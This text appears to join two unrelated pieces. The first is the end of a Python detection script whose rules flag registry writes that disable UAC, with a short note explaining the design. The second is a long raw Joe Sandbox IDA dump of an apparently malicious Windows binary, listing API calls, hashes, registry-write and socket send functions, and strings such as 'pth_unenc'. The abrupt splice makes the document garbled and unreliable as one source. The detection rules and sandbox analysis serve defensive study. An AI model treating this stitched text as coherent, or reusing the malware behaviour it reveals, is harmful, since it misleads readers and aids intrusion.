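        if UAC_VALUE_PATH.search(ev.get("TargetObject", "")) and ZERO_DWORD.search(ev.get("Details", "")):
            hits.append("uac_disable_regset")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Run every rule over every record; returns (rule, Image) pairs for the hits."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        for rule in classify(ev):
            findings.append((rule, ev.get("Image", "")))
    return findings


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:22s} {image}")
```

The process-creation rule and the registry rule are deliberately independent: the first catches the command line even when the write later fails, the second catches the same change made through any other tool (PowerShell, a direct RegSetValueExW from the implant) that never goes through reg.exe.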
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                              APIs
                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: pth_unenc$BG
                              • API String ID: 1818849710-2233081382
                              • Opcode ID: 33291842164d3cd534f50c8358874d6d17caaa1fe138597c3d3bb1c43a6161c1
                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                              • Opcode Fuzzy Hash: 33291842164d3cd534f50c8358874d6d17caaa1fe138597c3d3bb1c43a6161c1
                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                              • String ID: KeepAlive | Disabled
                              • API String ID: 2993684571-305739064
                              • Opcode ID: 6a2e9fed7c31a08c387878a041e76ce1f8cb1591724bfece31842f89ecd98ae4
                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                              • Opcode Fuzzy Hash: 6a2e9fed7c31a08c387878a041e76ce1f8cb1591724bfece31842f89ecd98ae4
                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                              APIs
                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                              Strings
                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                              • API String ID: 3024135584-2418719853
                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                              • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                              APIs
                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                              • String ID:
                              • API String ID: 3525466593-0
                              • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                              • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                              • __freea.LIBCMT ref: 0044FFC4
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                              • String ID:
                              • API String ID: 313313983-0
                              • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                              • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                              • _free.LIBCMT ref: 0044E1A0
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                              • String ID:
                              • API String ID: 336800556-0
                              • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                              • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                              APIs
                              • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                              • _free.LIBCMT ref: 00446F7D
                              • _free.LIBCMT ref: 00446FA4
                              • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                              • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free
                              • String ID:
                              • API String ID: 3170660625-0
                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                              APIs
                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseHandleOpen$FileImageName
                              • String ID:
                              • API String ID: 2951400881-0
                              • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                              • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                              APIs
                              • _free.LIBCMT ref: 0044F7B5
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 0044F7C7
                              • _free.LIBCMT ref: 0044F7D9
                              • _free.LIBCMT ref: 0044F7EB
                              • _free.LIBCMT ref: 0044F7FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                              APIs
                              • _free.LIBCMT ref: 00443305
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 00443317
                              • _free.LIBCMT ref: 0044332A
                              • _free.LIBCMT ref: 0044333B
                              • _free.LIBCMT ref: 0044334C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                              APIs
                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                              • IsWindowVisible.USER32(?), ref: 004167A1
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessWindow$Open$TextThreadVisible
                              • String ID: (FG
                              • API String ID: 3142014140-2273637114
                              • Opcode ID: f1ec84a98d434292b3bb184935321379dc8f8878a94d9c86ba59561147998443
                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                              • Opcode Fuzzy Hash: f1ec84a98d434292b3bb184935321379dc8f8878a94d9c86ba59561147998443
                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                              APIs
                              • _strpbrk.LIBCMT ref: 0044D4A8
                              • _free.LIBCMT ref: 0044D5C5
                                • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00434403,?,?,?,00434403,00000016,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,?,00434403), ref: 0043A878
                                • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000,?,00434403), ref: 0043A87F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                              • String ID: *?$.
                              • API String ID: 2812119850-3972193922
                              • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                              • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                              • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                              • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                              APIs
                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
